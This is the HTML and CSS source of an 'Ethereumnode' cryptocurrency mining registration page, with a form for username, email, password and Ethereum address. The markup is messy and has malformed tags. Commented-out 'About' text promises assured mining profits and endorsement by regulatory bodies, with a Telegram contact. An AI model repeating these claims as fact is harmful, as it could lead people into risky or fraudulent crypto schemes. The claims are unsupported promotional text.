
  <!DOCTYPE html>
  
  <html lang="en">
  
<head>
   <title> Ethereumnode | Register</title>

<meta name="viewport" content="width=device-width, initial-scale=1" />
   <style type="text/css">


  
 
  
  .ul {
  font-size: 22px;
  color: blue;
  text-align: center;
  }
    

     body {
    margin: 0;
    padding: 0;
          background-image: url("https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img51.png");
     background-color:  hsla(240, 100%, 50%, 0.7);
    }
    
    /*      background-image: url("https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img51.png");*/
  .n
  {
  background-image: url("images/index2.png");
  color: red;



  }

   .vv {

      position: absolute;
      top: 5px;
      left: 8px;
   }
  

  
  
  .vv1 {
  border: 50px insert white;
  border-radius: 7px;
  background: hsla(240, 100%, 50%, 0.8);
      
  color: white;
  padding-left: 35px;
  padding-right: 35px;
  margin-right: 5px;
  margin-left: 1px;
  Font-size: 18px;
  
  }
    
    
    
    
    
    
    
      .center2 {
      margin-left: 0px;
      }
  
  
      #fuck3 {
      
      width: 60%;
      height: 25%;
      }
      

      
      
      .container1 {
      position: relative;
      height: 35px;
      top: -4px;
      }
      
      
      .bb1 {
      margin-left: 55%;
      }
      
     
     .bb2 {
     margin-left: 64.50%;
     }
     
     
     
     
     
     
     
     
     
     
     .man4 {
     box-shadow: 1px 5px 10px 1px hsla(240, 100%, 50%, 0.4), 0 1px 2px 1px hsla(240, 100%, 50%, 0.1);
     }
     
     
     /*
     .form-container {
     margin: 20px;
     padding: 15px;
     background: #173459;
     color: white;
     box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
     }
     .input-cnt {
     display: flex; /* display the icon and the input in a line */
  /*   margin-bottom: 15px;
     }
     .input-cnt:last-child {
     margin-bottom: 0px;
     }
     .input-cnt > i {
     min-width: 40px; /* set a minimum width for the icon */
/*
     padding: 10px; /* make sure the icon is centered vertically */
  /*   text-align: center; /* horizontally center the icon */
  /*   background: lightgrey;
     border-top-left-radius: 20px;
     border-bottom-left-radius: 20px;
     color: #0076ff;
     }
     /* change styles when focused */
   /*  .input-cnt:hover > i {
     background: #0076ff;
     color: white;
     }
     /* style the inputs */
  /*   .input-cnt > input[type="text"], .input-cnt > input[type="password"] {
     outline: none;
     border: none;
     padding: 7.20px;
     border: 1px solid lightgrey;
     border-top-right-radius: 20px;
     border-bottom-right-radius: 20px;
     width: 100%;
     }
     /* style the submit button */
 /*    .input-cnt > input[type="submit"] {
     border: none;
     border-radius: 20px;
     outline: none;
     width: 75%;
     margin: 0 auto;
     font-size: 105%;
     padding: 8px;
     color: #0076ff;
     background: white;
     transition-duration: .5s;
     }
     /* add a hover effect for the submit button */
    /* .input-cnt > input[type="submit"]:hover {
     color: white;
     background: #0076ff;
     }
     
   /*  #span1{
     border: 50px insert white;
     border-radius: 7px;
     background: hsla(240, 100%, 50%, 0.8);
     
     color: white;
     padding-left: 35px;
     padding-right: 35px;
     margin-right: 5px;
     margin-left: 1px;
     Font-size: 18px;
     
     }
     
     #scan1 {
     border: 20px insert white;
     border-radius: 1px;
     background: hsla(240, 100%, 50%, 0.8);
     
     color: white;
     padding-left: 30px;
     padding-right: 30px;
     margin-right: 1px;
     margin-left: 10px;
     Font-size: 10px;
     
     }
     
     
     */
     
     
     
     
     
     
     
     
     form {
     
     background-color: white;
     
     max-width: 80%;
     max-height: 1000px;
     margin: 5px auto;
     
     padding: 5px 20px;
     
     box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
     }
     
     body {
     background-image: ul("images/index2.png");
     background-repeat: no-repeat;
     position: relative;
     align: center;
     }
     
     
     
     .ul {
     font-size: 22px;
     color: blue;
     text-align: center;
     }
     
     * {
     box-sizing: border-box;
     }
     html, body {
     margin: 0;
     padding: 0;
     }
     
     
     
     
     
     
     
      
      
      
      .ul {
      font-size: 22px;
      color: blue;
      text-align: center;
      }
      
      
      hml, body {
      margin: 0;
      padding: 0;
      }
      
      .n
      {
      background-image: url("images/index2.png");
      color: red;
      
      
      
      }
      
      .vv {
      position: absolute;
      top: 5px;
      left: 8px;
      }
      
      
      
      
      .vv1 {
      border: 50px insert white;
      border-radius: 7px;
      background: hsla(240, 100%, 50%, 0.8);
      
      color: white;
      padding-left: 35px;
      padding-right: 35px;
      margin-right: 5px;
      margin-left: 1px;
      Font-size: 18px;
      
      }
      
      
      
      
      
      
      
      .center2 {
      margin-left: 0px;
      }
      
      
      #fuck4 {
      
      width: 9%;

      height: auto;
      height: 15px
      }
      
      #fuck3 {
      
      width: 35px;
      height: 23px;

      }
      
      
      
      
.container11 {
position: relative;
height: 16px;
}


      
      
      .bb1 {
      margin-left: 55%;
      }
      
      
      .bb2 {
      margin-left: 64.50%;
      }
      
      
      
      #fuck44 {
      position: absolute;
      width:170px;
      height: 25.50px;
      
      }

      
      
      
      
      
      
      
      
      
      
      #span {
      border: 50px insert white;
      border-radius: 7px;
      background: hsla(240, 100%, 50%, 0.8);
      
      color: white;
      padding-left: 35px;
      padding-right: 35px;
      margin-right: 5px;
      margin-left: 1px;
      Font-size: 18px;
      
      }
      
      
      
     .form11 {
     
     background-color: white;
     
     max-width: 80%;
     
     margin: 5px auto;
     
     padding: 5px 20px;
     
     box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.12);
     }
     
     
     
     
     
     
     
     
     
     
    /* 
     
     * {
     box-sizing: border-box;
     }
     html, body {
     margin: 0;
     padding: 0;
     }
     form {
     box-shadow: 1px 5px 10px 1px hsla(240, 100%, 50%, 0.4), 0 1px 2px 1px hsla(240, 100%, 50%, 0.1);
     }
     .form-container {
     margin: 20px;
     padding: 15px;
     background: #173459;
     color: white;
     box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
     }
     .input-cnt {
     display: flex; /* display the icon and the input in a line */
   /*  margin-bottom: 15px;
     }
     .input-cnt:last-child {
     margin-bottom: 0px;
     }
     .input-cnt > i {
     min-width: 40px; /* set a minimum width for the icon */
   /*  padding: 10px; /* make sure the icon is centered vertically */
   /*  text-align: center; /* horizontally center the icon */
  /*   background: lightgrey;
     border-top-left-radius: 20px;
     border-bottom-left-radius: 20px;
     color: #0076ff;
     }
     /* change styles when focused */
   /*  .input-cnt:hover > i {
     background: #0076ff;
     color: white;
     }
     /* style the inputs */
  /*   .input-cnt > input[type="text"], .input-cnt > input[type="password"] {
     outline: none;
     border: none;
     padding: 7.20px;
     border: 1px solid lightgrey;
     border-top-right-radius: 20px;
     border-bottom-right-radius: 20px;
     width: 100%;
     }
     /* style the submit button */
  /*   .input-cnt > input[type="submit"] {
     border: none;
     border-radius: 20px;
     outline: none;
     width: 75%;
     margin: 0 auto;
     font-size: 105%;
     padding: 8px;
     color: #0076ff;
     background: white;
     transition-duration: .5s;
     }
     /* add a hover effect for the submit button */
    /* .input-cnt > input[type="submit"]:hover {
     color: white;
     background: #0076ff;
     }
     */
     #span {
     border: 50px insert white;
     border-radius: 7px;
     background: hsla(240, 100%, 50%, 0.7);
     
     color: white;
     padding-left: 35px;
     padding-right: 35px;
     margin-right: 5px;
     margin-left: 1px;
     Font-size: 18px;
     
     }
     
     .man5 {
     
     background-color: white;
     
     max-width: 315px;
     
     margin: 2px auto;
     
     padding: 2px 20px;
     
     box-shadow: 2px 3px 6px 2px rgba(0, 0, 0, 0.2);
     
     }
     .man6 {
     color: #134580;
     font-size: 10px;
     }
     #uf {
     width: 15%;
     height: auto;
     height:  50px;
     }
     
      
      #man {
      border: 50px insert white;
      border-radius: 7px;
      background: hsla(240, 100%, 50%, 0.7);
      
      color: white;
      padding-left: 35px;
      padding-right: 35px;
      margin-right: 5px;
      margin-left: 1px;
      Font-size: 18px;
      
      }
      
      
      .container1 {
      position: relative;
      height: 35px;
      top: -4px;
      }
      
      
      
      
      
      
      
      /* form */
      
      
      
      bvohdy {
      
          background-color: white;
      
          font-family: Roman;
      
          text-align: center;
      
      }
      
      form {
      
          background-color: white;
      
          max-width: 0px;
      
          margin: 50px auto;
      
          padding: 30px 20px;
      
          box-shadow: 2px 5px 10px rgba(0, 0, 0, 0.5);
      
      }
      
      .form-control {
      
          text-align: left;
      
          margin-bottom: 25px;
          } 
      
      .form-control label {
      
          display: block;
      
          margin-bottom: 10px;
      
      }
       
      /*
      .form-control input,

      .form-control select,
      
      .form-control textarea {
      
          border: 1px solid #777;
      
          border-radius: 7px;
      
          font-family: inherit;
      
          padding: 10px;
      
          display: block;
      height: 45px;
          width: 95%;
      margin-left: 8px;
      }
  */
      
      
      .form-control input[type="radio"],
      
      .form-control input[type="checkbox"] {
      
          display: inline-block;
      
          width: auto;
      
      }
      
      button {
      
          background-color: lightblue;
      
          border: 0px solid #777;
      
          border-radius: 2px;
      
          font-family: inherit;
      
          font-size: 30px;
      
          display: block;
      
          width: 100%;
      
          margin-top: 50px;
      
          margin-bottom: 20px;
      
      }
      
             
           #id1 {
           height: 65px;
           }
           
           #span{
           border: 50px insert whitr;
           border-radius: 15px;
           
        background: hsla(240, 100%, 25%, 0.9);
           color: white;
           padding-left: 100px;
           padding-right: 100px;
           margin-right: 5px;
           margin-left: 1px;
           Font-size: 18px;
      
           }
           
           #name {
        border-radius: 5px;
            height: 30px;
             }
             
             #email {
             border-radius: 5px;
          height: 30px;    
             }
             
             #age {
             border-radius: 5px;
             height: 30px;
      
             }
             
             
         /*    .hp1{
             margin-right: -20px;
           }*/
           
           .span4n{
           padding-right: 0px;
          }
          
          a {
          text-decoration: none;  
         color: #134580;
          }
          
         #span11 {
         border: 1px inset #0076ff;
         border-radius: 10px;
         background: white;
         color: #134580;
         padding-left: 20px;
         padding-right: 20px;
         margin-right: 10px;
         margin-left: 10px;
         Font-size: 8px;
         }
        #mann{
        text-decoration: none;  
       color: grey;
        }
        
        
        
        
        /*
          .button1 {
        height: 48px;
        width: 90%;
            border-radius: 30px;  
        border: 12px;
        font-size: 14px;
        color: white;
        background: hsla(240, 100%, 25%, 0.9);
        }
     */     
          
        #c {
        position: relative;
        top: -27px;
        }
        
        iimmi {
        position: relative;
        background-position: left;
        
        }
        
        #cc {
        position: relative;
        top: -55px;
        
        }
        
        
      
          
          
          
          #ivi {
          position: relative;
          margin-left: -13%;
          }
          
          
          
          /*
          .button2:hover {
         background-color: hsla(240, 100%, 25%, 0.9);
         color:   white;
         border: 1px solid hsla(240, 100%, 25%, 0.9);
         box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
         cursor: pointer;
         -webkit-transition-duration: 1s; /* for Safari */
       /*  transition-duration: 0.10s;
          }
          
          .button2 {
          border: 1px solid hsla(240, 100%, 25%, 0.9);
          height: 48px;
          width: 90%;
          border-radius: 30px;  
          bordner: 12px;
          font-size: 14px;
          background: white;
          color:  hsla(240, 100%, 25%, 0.9);
          }
          
      */    
          a {
          text-decoration: none;  
            color: hsla(240, 100%, 50%, 0.8);
          }
          
          
          .span4 {
          position: relative;
          top: -3px;
          
          }
      
      
      
      
      .button1:hover {
      background-color: hsla(0, 0%, 0%, 0.5);
      color:   white;
      border: none;
      box-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
      cursor: pointer;
      -webkit-transition-duration: 0s; /* for Safari */
      transition-duration: 0s;
      }
      
      .butt6on1 {
               outline: none;
      border: none;
      height: 52px;
      width: 80%;
      border-radius: 30px;  
      bordner: 12px;
      font-size: 14px;
      background: white;
      color:  white;
      background:     hsla(240, 100%, 25%, 0.9);
      
      }
      
      
         
         
         
         /*xxx*/
         .form-control input,
         
         .form-control select,
         
         .form-control textarea {
         

       border: 0.70px solid black;
               ouhtnline: nonne;
       border-radius: 7px;

                    outline-color:  hsla(120, 100%, 50%, 0.8);
                    /*  hsla(240, 100%, 25%, 0.9);;*/
         border-radius: 7px;
         
         font-family: inherit;
         
         padding: 10px;
         
         display: block;
         height: 49px;
         width: 92%;
         margin-left: 13px;
         }
         
         
         .button1 {
         outline: none;
         
         border: none;
         height: 50px;
         width: 77%;
         border-radius: 30px;  
         bordner: 12px;
         font-size: 14px;
         background: white;
         color:  white;
         background:     hsla(240, 100%, 25%, 0.9);
         
         }
         
         .ty {
         margin-left: 14.50px;
         }
         
        #ii {

        outline: none;
        position: relative;
                 margin-left: 15.50px; 
      }
      
      
          #fuck3333 {
          position: relative;
          top: 3.50px;
              width: 5.50%;
          height: auto;
          height:  15px;
          }
          
          
    .ccc {
     position: relative;
     top: -30px;
     font-size: 16px;
       font-weight: bold;
          }   
          
          

         
         INPUT[type=checkbox]
         {
         
         border: 0.65px solid black;
         background-color: white;
         border-radius: 3px;
         appearance: none;
         -webkit-appearance: none;
         -moz-appearance: none;
         width: 17px;
         height: 17px;
         cursor: pointer;
         position: relative;
         top: 4.30px;
         }
         
         INPUT[type=checkbox]:checked
         {
         
         
         background-color: #409fd6;
         background:  hsla(240, 100%, 25%, 0.9)  url("data:image/gif;base64,R0lGODlhCwAKAIABAP////3cnSH5BAEKAAEALAAAAAALAAoAAAIUjH+AC73WHIsw0UCjglraO20PNhYAOw==") 3px 3px no-repeat;
         }
         
         
         
         
      
</style>
</head>
      <body style="font-size: 15px; font-family: 'Montserrat Alternates', sans-serif;">
      <div class="container1" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
      <div class="vv">
      <b style="font-size: 13px">   

      <section>
             <small> <b>        
   


           
          <!-- 
           <b style="color: black; font-size: 16px">&nbsp;Welcome to ETHEREUM</b><b style="font-size: 10px">NODE</b> 
           <b style="font-size: 20px; color: black">|&nbsp;<b style="color: black;font-size: 16px"><u><a href="learnmore.html"style="text-decoration: none; color: black"> learn More..</u></a></b></b>
          <!--  <a href="indexETH(bar alert).html"style="text-decoration: none;"> 
          <!--    <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 20px">&nbsp;ETHEREUM </b><b style="font-size: 12.50px;">NODE</b></b>
           -->
           
           
           <!--             <small> <b>         <a href="indexETH(bar alert).html"style="text-decoration: none;">          <img id="fuck3" src="../images/index19.jpg" /></a><b style="color: hsla(0, 0%, 0%, 0.8); font-size: 13.50px; text-align: center">&nbsp;ETHEREUM </b><b style="font-size: 13.50px; text-align: center">NODE <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 13px; ">|</b></b><img id="fuck4" src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img53.png" /><b style="text-align: center">Ethereum:<b style="color: hsla(0, 0%, 0%, 0.8); text-align: center">$1635.55 </b></b></dd></small>-->
     <!--      
           <b style="color: black; font-size: 9.50px">Welcome to ETHEREUM</b><b style="font-size: 5.50px">NODE</b> 
           <b style="font-size: 15px; color: black">|&nbsp;<b style="color: black;font-size: 9.50px">Easly mine and withdraw everyday<b style="font-size: 15px; color: black">&nbsp;|&nbsp;</b><u><a href="#more"style="text-decoration: none; color: black; font-size: 9.50">More>></u></a></b></b></b>
           <!--  <a href="indexETH(bar alert).html"style="text-decoration: none;"> 
           <!--    <b style="color: hsla(0, 0%, 0%, 0.8); font-size: 20px">&nbsp;ETHEREUM </b><b style="font-size: 12.50px;">NODE</b></b>
           -->
           
           
      <!--     
           
           </section>
      </span></span></section></div></div></b></b>
       
      -->
      
      <b>
      </section>
            </span></span></section></div></div></b></b>
             
                <center class="ccc">   <span style="color: hsla(120, 100%, 50%, 1); font-size: 10px;">     <img id="fuck3333"src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img53.png">ETHEREUM</span><span style="color: white;: red; font-size: 10px;">NODE</span>
      
       </center>
       </small>
   </b>




       <p>&nbsp;</p>

       
       
      <!-- 
       
       
     <form>
     <h3 style="text-align: center; color: blue"> Registration </h3><hr />
     <p>&nbsp;</p>
     
     
     <div class="input-cnt">
     <i class="material-icons"style="font-size7: 80%">name</i>
     <input type="text" placeholder="Full Name" name="name" />
     </div>
     
     <div class="input-cnt">
     <i class="material-icons"style="font-size: 80%">face</i>
     <input type="text" placeholder="Username" name="username" />
     </div>
     
     <div class="input-cnt">
     <i class="material-icons"style="font-size: 80%">email</i>
     <input type="text" placeholder="Email" name="email" />
     </div>
     
     <div class="input-cnt">
     <i class="material-icons"style="font-size: 80%">lock</i>
     <input type="password" placeholder="password" name="password" />
     </div>
     
     <div class="input-cnt">
     <i class="material-icons"style="font-size: 80%">lock</i>
     <input type="password" placeholder="Retype password" name="password" />
     </div>
     
     <div class="input-cnt">
     </div>
     
     
     <p><a href="registrationsuccessfull.html"style="text-decoration: none;"><center>
     <span id ="span"style=">color: white; font-size: 17.50px"><b>Register</b></span></center></a></p>
     <p> <small style="font-size: 75%"> <center>Already have an account?   <a href="login.html"style="text-decoration: none;color: blue; font-size: 105%"><b>Log In</b></a></center></small></small>
     </div>
     
     
     </p>
     </form>
     
 -->
       
       
           <fom id="form">
       
       
       <!--
       <div class="form-control">
       
       
       
       
           <label for="name" id="label-name">
       
               
       
           </label>
           
       
           <input type="text"
       
                  id="name"
       
                  placeholder=" Enter your full name" />
       
       </div>
       
       <div class="form-control">
       
           <label for="text" id="label-age">
       
       
       
           </label>
       
           
       
       
       <input type="text"
       
                  id="age"
       
                  placeholder="Enter a username "  />
       
       
       
       </div>
       

       <div class="form-control">
       
           <label for="email" id="label-email">
       
       
       
           </label>
       
           <input type="email"
       
                  id="email"
       placeholder="Enter your email" />
       
   </div>
   
   -->
   
   
       <p style="text-align: center; font-size: 20px;">Registration</p>
   
       
<!--     <div class="form-control">

     <input type="text" placeholder="Enter your full name" name="name" />
     </div>
     
     
     
     -->
     
     <div class="form-control">

     <input type="text" placeholder="Enter a username" name="username" />
     </div>
     
       <div class="form-control">

       <input type="text" placeholder="Enter your email" name="email" />
       </div>
       
       
       
       <div class="form-control">

       <input type="password" placeholder="Enter password" name="password" />
       </div>
       
       
       
       
       <div class="form-control">
       
       <input type="password" placeholder="Retype password" name="password" />
       </div>
       
       
       <div class="form-control">
       
       <input type="text" placeholder="Enter your ethereum address" name="address" />
       </div>
       
       
       
         <!--
       
       <div class="form-control">
       
           <label for="role" id="label-role">
       
               Select your occupation
               
            
       
           </label>
       
            
       
         <!-- Dropdown options -->
       
         <!--  <select name="role" id="role">
       
               <option value="student">Student</option>
       
               <option value="intern">Intern</option>
       
               <option value="professional">
       
                   Professional
       
               </option>
       
               <option value="other">Other</option>
       
          </select>
          -->
       
       
       <p class="p1"style="text-align: left"><input id="ii" type="checkbox"name="inp"><span class="span4"><span style="font-size: 12.50px">I agree with   <a href="termsandconditions.html" style="color: hsla(120, 100%, 50%, 0.8)"><bb>Terms and <bb>Coditions</a></b></p>
       </p></div></fom>
       
          
          
          
          <center id="c">  <a href="registrationsuccessfull.html"style="text-decoration: none"> <button class="button1">Register</button></a>
                <p style="font-size: 14px; text-align: center; color: black">Already have an account? <a href="login.html"style="color: hsla(120, 100%, 50%, 0.8)">Log In</a></p></center>
       
       
       
       
       
       
       


       <p>&nbsp;</p>

       <p>&nbsp;</p>


       
       
       

       

       
       
       
       <!--
       <body style="font-size: 15px; font-family: 'Montserrat Alternates', sans-serif;">
       <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
       <div class="vv">
       <b style="font-size: 13px">     
       
       <p>ABOUT</p></b>
       <p style="font-size: 10.80px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
       </p>
       <p style="font-size: 11.50px;"><b style="color: hsla(0, 0%, 0%, 0.3)"> ETHEREUM</b><b style="font-size: 7px">NODE</b> <b class="bb1"style="color: hsla(0, 0%, 0%, 0.8)">CONTACTS </b>  </p> </a></b>

        <section style="font-size: 11px;">     <a href="#"style="text-decoration: none;"> <span  style="color: hsla(0, 0%, 0%, 0.8)"> Home</span></a><span class="bb2">     <a href="indexcustomerservice.html"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">Customer service</span></a>
        <section style="font-size: 11px;">     <a href="##"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)"> FAQ</span></a><span class="bb2">     <a href="   https://t.me/ETH_Miner_Customer_Service"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">
        &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;   &nbsp;&nbsp;&nbsp;
        telegram link</span></a></span></section></span></section></div></div>
        
        
        -->
        <!--
        <body style="font-size: 11px; font-family: 'Montserrat Alternates', sans-serif;">
        <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
        <div class="vv">
        <b style="font-size: 11px">     
        
        <p id="more">ABOUT</p></b>
        <p style="font-size: 8.80px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
        </p>
        <p style="font-size: 9.50px;"><b style="color: hsla(0, 0%, 0%, 0.8)"> ETHEREUM</b><b style="font-size: 6px">NODE</b> <b class="bb1"><span class="span11"style="color: hsla(0, 0%, 0%, 0.8)"> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CONTACTS</b>  </p> </a></b>
        
        <section style="font-size: 9px;"><span style="color: hsla(0, 0%, 0%, 0.8)">     <a href="#"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">  Home</a></span><span class="bb2">     <a href="indexcustomerservice.html"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Customer service</span></a>
        <section style="font-size: 9px;">     <a href="##"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)"> FAQ</span></a><span class="bb2">     <a href="   https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none;"> <span style="color: hsla(0, 0%, 0%, 0.8)">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;telegram link </span>
        </a></span>
        
        -->
        <!--
        <body style="font-size: 11px; font-family: 'Montserrat Alternates', sans-serif;">
        <div class="container11" style="background-color: hsla(240, 100%, 50%, 0.3); color: white">
        <div class="vv">
        <b style="font-size: 11px">     
        <center>
        <p id="more"><u style="color: red"><span style="font-size: 9px;">ABOUT <b><span style=" color:  hsla(240, 100%, 25%, 0.9);">ETHEREUM</span><span style="color: white; font-size: 9">NODE</span></b></p></b></u>
        <p style="font-size: 8.80px">This company is standard ETH cryptocurrency mining company where miner's can earn Ethereum through the legal and assured means of profiting the Blockchain Technology. Over the years, we have been chosen by many all around the globe and have been recommended by many regulatory bodies for our quality mining pool and we are on the Mission to provide the right full and legal means of earning cryptocurrency through mining. Get rewarded, join the mining network, join Ethereumnode today.
        </p></center>
        
        <center class="uiu">
        
        <center class="uii"><span style="font-size: 9px; color: black"><a href="#"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">HOME</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;</span><span style="font-size: 9px; color: black"><a href="##"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">FAQ</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">CUSTOMER SERVICE</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="https://t.me/Ethereumnode_Customer_Service"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">TELEGRAM LINK</a>&nbsp;</span><span style="color: white; font-size: 14px;">&nbsp;<span style="font-size: 9px; color: black"><a href="##"style="text-decoration: none; color: hsla(0, 0%, 0%, 0.8)">NEWS</span>
        
        
        
        -->
        
        
      
     
      

      
      
      
      
      
      
      
      
      
      






     
     
     </body>
     </html>
     
     
     
     